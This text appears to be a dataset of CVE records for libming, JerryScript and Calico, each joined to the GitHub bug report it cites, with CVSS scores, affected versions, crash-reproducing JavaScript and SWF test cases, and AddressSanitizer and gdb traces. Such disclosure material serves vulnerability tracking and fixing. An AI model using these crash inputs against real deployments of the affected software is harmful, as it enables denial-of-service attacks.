/home/tim/libming-asan/util/decompile.c:3494 #4 0x5645c2847464 in decompile5Action /home/tim/libming-asan/util/decompile.c:3517 #5 0x5645c283348e in outputSWF_DOACTION /home/tim/libming-asan/util/outputscript.c:1551 #6 0x5645c2835a92 in outputBlock /home/tim/libming-asan/util/outputscript.c:2083 #7 0x5645c2836b88 in readMovie /home/tim/libming-asan/util/main.c:281 #8 0x5645c2837322 in main /home/tim/libming-asan/util/main.c:354 #9 0x7fbdee9fcb6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/libming-asan/util/decompile.c:2473 in decompileIF Shadow bytes around the buggy address: 0x0c3a7fff80c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3a7fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3a7fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3a7fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3a7fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c3a7fff8110: 00 00 00 00 fa[fa]fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3097==ABORTING ```
heap overflow in decompileIF decompile.c:2473
https://api.github.com/repos/libming/libming/issues/196/comments
0
2020-04-17T02:47:07Z
2020-04-17T02:47:07Z
https://github.com/libming/libming/issues/196
601,663,070
196
CVE-2020-11895
2020-04-19T19:15:12.977
Ming (aka libming) 0.4.8 has a heap-based buffer over-read (2 bytes) in the function decompileIF() in decompile.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/197" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/197
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
./swftocxx $poc [segmentaion_fault_decompile_569-out_of_bound-idx:0x1186-0x10.zip](https://github.com/libming/libming/files/4490668/segmentaion_fault_decompile_569-out_of_bound-idx.0x1186-0x10.zip) ``` root@ubuntu:/home/tim/libming/util# ../../libming-asan/util/swftocxx overflows/segmentaion_fault_decompile_569-out_of_bound-idx\:0x1186-0x10 header indicates a filesize of 1484 but filesize is 228 #include <mingpp.h> main(){ SWFMovie* m = new SWFMovie(10); Ming_setScale(1.0); m->setRate(24.000000); m->setDimension(-9480, 8000); // SWF_PLACEOBJECT3 Stream out of sync after parse of blocktype 12 (SWF_DOACTION). 223 but expecting 200. // SWF_DOACTION ================================================================= ==3292==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f000000c70 at pc 0x561ec3153e3b bp 0x7fff7af46a10 sp 0x7fff7af46a00 READ of size 2 at 0x61f000000c70 thread T0 #0 0x561ec3153e3a in decompileIF /home/tim/libming-asan/util/decompile.c:2436 #1 0x561ec3158ea3 in decompileAction /home/tim/libming-asan/util/decompile.c:3335 #2 0x561ec315932e in decompileActions /home/tim/libming-asan/util/decompile.c:3494 #3 0x561ec3152d13 in decompile_SWITCH /home/tim/libming-asan/util/decompile.c:2235 #4 0x561ec3154f7b in decompileIF /home/tim/libming-asan/util/decompile.c:2594 #5 0x561ec3158ea3 in decompileAction /home/tim/libming-asan/util/decompile.c:3335 #6 0x561ec315932e in decompileActions /home/tim/libming-asan/util/decompile.c:3494 #7 0x561ec3159464 in decompile5Action /home/tim/libming-asan/util/decompile.c:3517 #8 0x561ec314548e in outputSWF_DOACTION /home/tim/libming-asan/util/outputscript.c:1551 #9 0x561ec3147a92 in outputBlock /home/tim/libming-asan/util/outputscript.c:2083 #10 0x561ec3148b88 in readMovie /home/tim/libming-asan/util/main.c:281 #11 0x561ec3149322 in main /home/tim/libming-asan/util/main.c:354 #12 0x7faeb56eab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #13 0x561ec313b469 in _start (/home/tim/libming-asan/util/.libs/swftocxx+0x14469) 0x61f000000c70 is located 16 bytes to the right of 3040-byte region [0x61f000000080,0x61f000000c60) allocated by thread T0 here: #0 0x7faeb5c3d63e in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c63e) #1 0x561ec3154e26 in decompileIF /home/tim/libming-asan/util/decompile.c:2587 #2 0x561ec3158ea3 in decompileAction /home/tim/libming-asan/util/decompile.c:3335 #3 0x561ec315932e in decompileActions /home/tim/libming-asan/util/decompile.c:3494 #4 0x561ec3159464 in decompile5Action /home/tim/libming-asan/util/decompile.c:3517 #5 0x561ec314548e in outputSWF_DOACTION /home/tim/libming-asan/util/outputscript.c:1551 #6 0x561ec3147a92 in outputBlock /home/tim/libming-asan/util/outputscript.c:2083 #7 0x561ec3148b88 in readMovie /home/tim/libming-asan/util/main.c:281 #8 0x561ec3149322 in main /home/tim/libming-asan/util/main.c:354 #9 0x7faeb56eab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/libming-asan/util/decompile.c:2436 in decompileIF Shadow bytes around the buggy address: 0x0c3e7fff8130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3e7fff8170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c3e7fff8180: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa[fa]fa 0x0c3e7fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3e7fff81d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3292==ABORTING root@ubuntu:/home/tim/libming/util# ```
heap overflow in decompileIF decompile.c:2436
https://api.github.com/repos/libming/libming/issues/197/comments
0
2020-04-17T02:50:13Z
2020-04-17T02:50:13Z
https://github.com/libming/libming/issues/197
601,663,990
197
CVE-2020-13622
2020-05-27T00:15:11.497
JerryScript 2.2.0 allows attackers to cause a denial of service (assertion failure) because a property key query for a Proxy object returns unintended data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3787" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/pull/3797" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3787
[ "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision https://github.com/jerryscript-project/jerryscript/commit/6cd309b5252d15f3e3e6481c72a4d8fa7f9557a9 ###### Build platform Ubuntu 20.04 LTS (Linux 5.4.0-31-generic x86_64) ###### Build steps ```sh python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function main() { var v4 = [13.37,13.37,1337,13.37,13.37]; var v5 = new Proxy(JSON,v4); var v7 = Object.freeze(v5); var v8 = JSON / 13.37; var v9 = JSON.stringify(v7); } main(); ``` ###### Output ``` $ build/bin/jerry test.js ICE: Assertion 'ecma_is_value_string (value)' failed at /tmp/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_string_from_value):742. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ```
Assertion 'ecma_is_value_string (value)' failed at jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_string_from_value):742
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3787/comments
0
2020-05-23T17:53:33Z
2020-05-26T13:22:51Z
https://github.com/jerryscript-project/jerryscript/issues/3787
623,709,607
3,787
CVE-2020-13623
2020-05-27T00:15:11.557
JerryScript 2.2.0 allows attackers to cause a denial of service (stack consumption) via a proxy operation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3785" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3785
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision https://github.com/jerryscript-project/jerryscript/commit/6cd309b5252d15f3e3e6481c72a4d8fa7f9557a9 ###### Build platform Ubuntu 20.04 LTS (Linux 5.4.0-31-generic x86_64) ###### Build steps ```sh python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address ``` ###### Test cases ``` var v2 = {}; var v4 = new Proxy(Uint8Array,v2); v4.__proto__ = v4; v4[1] = 2; ``` ``` var v1 = {}; var v3 = new Proxy(parseFloat,v1); v3.__proto__ = v3; var v6 = "aa".constructor; var v7 = parseFloat & v6; ```
Stack Exhaustion (ecma_proxy_object_get, ecma_proxy_object_set)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3785/comments
3
2020-05-23T08:58:58Z
2020-05-26T07:44:39Z
https://github.com/jerryscript-project/jerryscript/issues/3785
623,613,918
3,785
CVE-2020-13649
2020-05-28T15:15:11.980
parser/js/js-scanner.c in JerryScript 2.2.0 mishandles errors during certain out-of-memory conditions, as demonstrated by a scanner_reverse_info_list NULL pointer dereference and a scanner_scan_all assertion failure.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/commit/69f8e78c2f8d562bd6d8002b5488f1662ac30d24" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3786" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3788" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3786
[ "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision https://github.com/jerryscript-project/jerryscript/commit/6cd309b5252d15f3e3e6481c72a4d8fa7f9557a9 ###### Build platform Ubuntu 20.04 LTS (Linux 5.4.0-31-generic x86_64) ###### Build steps ```sh python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function main() { var v2 = new Float64Array(63797); var v4 = "d".constructor; var v6 = [1337,1337,1337,1337]; var v7 = []; var v8 = {constructor:v6,a:v7}; var v9 = v8.a; var v12 = 0; v9.toString = v4; var v14 = new Int16Array(); do { function v16(v17,v18,v19) { 'use strict' var v20 = Int16Array.toLocaleString(); var v22 = eval(v20); } var v24 = new Promise(v16); var v25 = v12 + 1; v12 = v25; v7[v25] = v14; } while (v12 < 1337); } main(); ``` ###### Output ``` $ build/bin/jerry test.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==434582==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55af4dd3f2b0 bp 0x7ffc7e016ab0 sp 0x7ffc7e016a80 T0) ==434582==The signal is caused by a READ memory access. ==434582==Hint: address points to the zero page. #0 0x55af4dd3f2af in scanner_reverse_info_list /tmp/jerryscript/jerry-core/parser/js/js-scanner-util.c:1557 #1 0x55af4dd5150a in scanner_scan_all /tmp/jerryscript/jerry-core/parser/js/js-scanner.c:3217 #2 0x55af4dd34f5e in parser_parse_source /tmp/jerryscript/jerry-core/parser/js/js-parser.c:2084 #3 0x55af4dd38d76 in parser_parse_script /tmp/jerryscript/jerry-core/parser/js/js-parser.c:2697 .. AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /tmp/jerryscript/jerry-core/parser/js/js-scanner-util.c:1557 in scanner_reverse_info_list ==434582==ABORTING ``` ``` $ gdb -q -nx build/bin/jerry -ex 'r test.js' Program received signal SIGSEGV, Segmentation fault. 0x00005555556422b0 in scanner_reverse_info_list (context_p=0x7fffffffca20) at /tmp/jerryscript/jerry-core/parser/js/js-scanner-util.c:1557 1557 if (scanner_info_p->type == SCANNER_TYPE_END) (gdb) x/i $rip => 0x5555556422b0 <scanner_reverse_info_list+133>: movzbl 0x10(%rax),%eax (gdb) i r rax rax 0x0 0 ```
NULL dereference in scanner_reverse_info_list
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3786/comments
0
2020-05-23T17:46:47Z
2020-05-27T12:40:44Z
https://github.com/jerryscript-project/jerryscript/issues/3786
623,708,437
3,786
CVE-2020-13649
2020-05-28T15:15:11.980
parser/js/js-scanner.c in JerryScript 2.2.0 mishandles errors during certain out-of-memory conditions, as demonstrated by a scanner_reverse_info_list NULL pointer dereference and a scanner_scan_all assertion failure.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/commit/69f8e78c2f8d562bd6d8002b5488f1662ac30d24" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3786" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3788" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3788
[ "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision https://github.com/jerryscript-project/jerryscript/commit/6cd309b5252d15f3e3e6481c72a4d8fa7f9557a9 ###### Build platform Ubuntu 20.04 LTS (Linux 5.4.0-31-generic x86_64) ###### Build steps ```sh python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function main() { var v2 = [13.37,13.37]; var v4 = [1337,1337,1337]; var v5 = [parseFloat,parseFloat,v2]; var v8 = new Float64Array(63797); var v10 = "d".constructor; var v12 = [1337,1337,1337,1337]; var v13 = []; var v14 = {constructor:v12,a:v13}; var v15 = v14.a; var v18 = 0; v15.toString = v10; var v20 = new Int16Array(); do { var v25 = String.fromCharCode(1337,128); try { var v26 = eval(v25); } catch(v27) { } var v28 = v18 + 1; v18 = v28; v13[v28] = v20; } while (v18 < 1337); } main(); ``` ###### Output ``` $ build/bin/jerry test.js ICE: Assertion 'context_p->error == PARSER_ERR_NO_ERROR' failed at /tmp/jerryscript/jerry-core/parser/js/js-scanner.c(scanner_scan_all):3196. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ```
Assertion 'context_p->error == PARSER_ERR_NO_ERROR' failed at jerry-core/parser/js/js-scanner.c(scanner_scan_all):3196
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3788/comments
0
2020-05-23T17:56:43Z
2020-05-27T12:40:44Z
https://github.com/jerryscript-project/jerryscript/issues/3788
623,710,199
3,788
CVE-2020-13597
2020-06-03T17:15:24.887
Clusters using Calico (version 3.14.0 and below), Calico Enterprise (version 2.8.2 and below), may be vulnerable to information disclosure if IPv6 is enabled but unused. A compromised pod with sufficient privilege is able to reconfigure the node’s IPv6 interface due to the node accepting route advertisement by default, allowing the attacker to redirect full or partial network traffic from the node to the compromised pod.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.7, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/91507" }, { "source": "[email protected]", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/BMb_6ICCfp8" }, { "source": "[email protected]", "tags": [ "Vendor Advisory" ], "url": "https://www.projectcalico.org/security-bulletins/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "95DB38FE-A03E-456B-874A-A58C31BE7592", "versionEndExcluding": null, "versionEndIncluding": "2.6.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "CAFD1D82-33C2-4656-8E0F-ABF518E14C68", "versionEndExcluding": null, "versionEndIncluding": "3.8.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "C016A3C9-D2ED-4CD6-93E1-2FF4876381C6", "versionEndExcluding": null, "versionEndIncluding": "2.7.4", "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "0EB520BC-FACF-4C67-AFCD-73741DD633CD", "versionEndExcluding": null, "versionEndIncluding": "2.8.2", "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "7AEA624B-1358-4116-A19C-CF20513F0180", "versionEndExcluding": null, "versionEndIncluding": "3.9.5", "versionStartExcluding": null, "versionStartIncluding": "3.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBDF7B5C-D289-48D0-A9E9-D468D182D0E9", "versionEndExcluding": null, "versionEndIncluding": "3.10.3", "versionStartExcluding": null, "versionStartIncluding": "3.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "C1373217-1065-4919-ADC9-055B556D3A41", "versionEndExcluding": null, "versionEndIncluding": "3.11.2", "versionStartExcluding": null, "versionStartIncluding": "3.11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "D4934106-DDAC-4E1B-BC8A-791EE911608F", "versionEndExcluding": null, "versionEndIncluding": "3.12.1", "versionStartExcluding": null, "versionStartIncluding": "3.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "CBB409FF-5177-4C87-A45F-072CE3A4D7ED", "versionEndExcluding": null, "versionEndIncluding": "3.13.3", "versionStartExcluding": null, "versionStartIncluding": "3.13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:3.14.0:*:*:*:*:*:*:*", "matchCriteriaId": "A78D854F-7BCB-4AF1-940E-AF61B469C0E5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/91507
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
